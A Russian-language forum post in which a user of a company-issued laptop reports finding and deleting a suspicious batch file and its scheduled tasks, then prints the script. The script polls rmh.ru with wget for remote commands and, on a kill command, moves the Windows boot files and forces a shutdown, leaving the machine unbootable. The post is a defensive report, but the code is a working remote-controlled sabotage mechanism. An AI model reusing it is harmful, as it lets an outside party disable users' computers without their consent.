Были выполнены действия:
1) c:\windows\system32\main.bat удалил файл.
2) Удалил файлы:
c:\windows\tasks\at1.job
c:\windows\tasks\at2.job
c:\windows\tasks\at3.job
c:\windows\tasks\at4.job
c:\windows\tasks\At1.job
c:\windows\tasks\At2.job
c:\windows\tasks\At3.job
c:\windows\tasks\At4.job
route print - чист
Структура bat файла:
Код |
---|
@echo off cd c:\windows\system32 :begin echo Searching for IP adress... ipconfig | grep IP if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto noip :ipfound echo IP address found in ipconfig output echo Pinging RMH.RU ping -n 1 rmh.ru | grep.exe Ping if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto noreply :inet echo Reply from RMH.RU retrieved echo Empty command echo > command.txt echo Retrieving command from server... wget --quiet --input-file=server.url --tries=3 --output-document=command.txt --timeout=30 --no-directories --no-host-directories --cache=off --user-agent=zmey2-0.1 echo Retrieved, checking command type command.txt | grep STOP if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto end :STOP type command.txt | grep STOP > nul if ERRORLEVEL 2 goto error if ERRORLEVEL 1 goto wcommand :die echo DIE command retrieved echo Moving boot.ini, ntdetect.com, ntldr move /y c:\boot.ini c:\windows move /y c:\ntdetect.com c:\windows move /y c:\ntldr c:\windows echo Shuting down shutdown -s -f -t 0 -c "Computer must be returned" goto end :noip echo IP address not found in ipconfig output goto end :noreply echo No reply from RMH.RU goto end :wcommand echo Wrong command retrieved. Typing command: echo --- type command.txt echo --- goto end :error echo Grep error goto end :end |
Вопрос такого характера - ноутбук, предоставлен компанией "Ромир", у меня подозрения, что они какие-то сведения хотели получать, при подключении к их сайту.